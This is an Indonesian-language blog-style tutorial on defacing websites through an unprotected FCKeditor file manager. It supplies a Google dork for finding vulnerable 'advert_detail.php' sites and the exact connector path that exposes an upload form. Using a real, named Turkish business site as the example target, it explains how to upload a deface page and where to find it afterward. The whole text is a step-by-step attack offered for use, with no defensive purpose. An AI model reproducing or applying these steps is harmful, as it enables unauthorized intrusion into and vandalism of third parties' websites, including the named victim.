Deface POC Fckeditor

HelloSobat Ketemu Lagi Ama Gw

Dan Kali Ini Gw Akan Jelasin Gimana Deface Dengan Poc Fckeditor

BAHAN: 1. DORK

                2.EXPLOIT

                3.SCRIPT LU

DORK:

inurl:advert_detail.php?id=

EXPLOIT:

/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

INGET id BISA DIGANTI AMA ALAMAT WEB NEGERA LAIN MISAL uk

BIAR TARGET BEDA DORK GW GANTI DENGAN 
inurl:advert_detail.php?jp=

Seperti Biasa Kita Cari Web Sesuai Fealing Kita

Disini gw Pake Target:

 fatihkocakotomotiv.com.tr/advert_detail.php?PageType...

Kalo Udh Nemu Target Lu Masukkin Exploit Diatas

Contoh: http://fatihkocakotomotiv.com.tr/advert_detail.php?PageType=4&ID=1458 Kalau Udh Dimasukkin Exploitnya Jadi: http://fatihkocakotomotiv.com.tr//admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

Kalo Udah Bakal MUncul Tempat Upload.... Liat Gambar Dibawah 

Kalo Udh Pilih Script Lu Lihat gambar dibawah 

Nah Disitu Pilih Sc Lu... Kalo Udh Jan Lupa DiUpload 

Nah Kalo Udh Diupload Cara Manggil Sc Lu Gini

www.target.com/files/namasclu.html

contoh:http://fatihkocakotomotiv.com.tr/files/CWJ[1](1).html

 

NAH SIMPLE KAN

SEMUA BISA KALO MAU BELAJAR

SAMPAI JUMPA DI NEXT TIME